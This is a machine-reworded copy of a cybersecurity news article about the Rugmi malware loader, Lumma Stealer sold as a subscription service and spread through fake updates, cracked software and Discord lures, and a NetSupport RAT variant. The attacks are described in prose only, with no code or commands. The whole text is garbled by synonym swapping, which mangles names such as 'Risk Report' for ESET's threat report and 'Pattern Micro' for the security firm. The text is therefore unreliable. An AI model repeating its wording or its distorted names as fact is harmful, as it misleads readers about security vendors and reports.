A brand new malware loader is being utilized by menace actors to ship a variety of info stealers reminiscent of Lumma Stealer (aka LummaC2), Vidar, RecordBreaker (aka Raccoon Stealer V2), and Rescoms.
Cybersecurity agency ESET is monitoring the trojan below the identify Win/TrojanDownloader.Rugmi.
“This malware is a loader with three forms of elements: a downloader that downloads an encrypted payload, a loader that runs the payload from inner assets, and one other loader that runs the payload from an exterior file on the disk,” the corporate stated in its Risk Report H2 2023.
Telemetry knowledge gathered by the corporate exhibits that detections for the Rugmi loader spiked in October and November 2023, surging from single digit every day numbers to a whole bunch per day.
From USER to ADMIN: Be taught How Hackers Achieve Full Management
Uncover the key ways hackers use to develop into admins, the right way to detect and block it earlier than it is too late. Register for our webinar at present.
Stealer malware is often offered below a malware-as-a-service (MaaS) mannequin to different menace actors on a subscription foundation. Lumma Stealer, as an example, is marketed in underground boards for $250 a month. The costliest plan prices $20,000, nevertheless it additionally provides the purchasers entry to the supply code and the precise to promote it.
There may be proof to counsel that the codebase related to Mars, Arkei, and Vidar stealers has been repurposed to create Lumma.
Apart from repeatedly adapting its ways to evade detection, the off-the-shelf device is distributed by a number of strategies starting from malvertising to pretend browser updates to cracked installations of standard software program reminiscent of VLC media participant and OpenAI ChatGPT.
One other approach issues using Discord’s content material supply community (CDN) to host and propagate the malware, as revealed by Pattern Micro in October 2023.
This entails leveraging a mix of random and compromised Discord accounts to ship direct messages to potential targets, providing them $10 or a Discord Nitro subscription in change for his or her help on a mission.
Customers who comply with the provide are then urged to obtain an executable file hosted on Discord CDN that masquerades as iMagic Stock however, in actuality, comprises the Lumma Stealer payload.
“Prepared-made malware options contribute to the proliferation of malicious campaigns as a result of they make the malware accessible even to probably much less technically expert menace actors,” ESET stated.
“Providing a broader vary of features then serves to render Lumma Stealer much more enticing as a product.”
The disclosures come as McAfee Labs disclosed a brand new variant of NetSupport RAT, which emerged from its legit progenitor NetSupport Supervisor and has since been put to make use of by preliminary entry brokers to collect info and carry out extra actions on victims of curiosity.
“The an infection begins with obfuscated JavaScript information, serving because the preliminary level of entry for the malware,” McAfee stated, including it highlights the “evolving ways employed by cybercriminals.”
The execution of the JavaScript file advances the assault chain by operating PowerShell instructions to retrieve the distant management and stealer malware from an actor-controlled server. The marketing campaign’s main targets embrace the U.S. and Canada.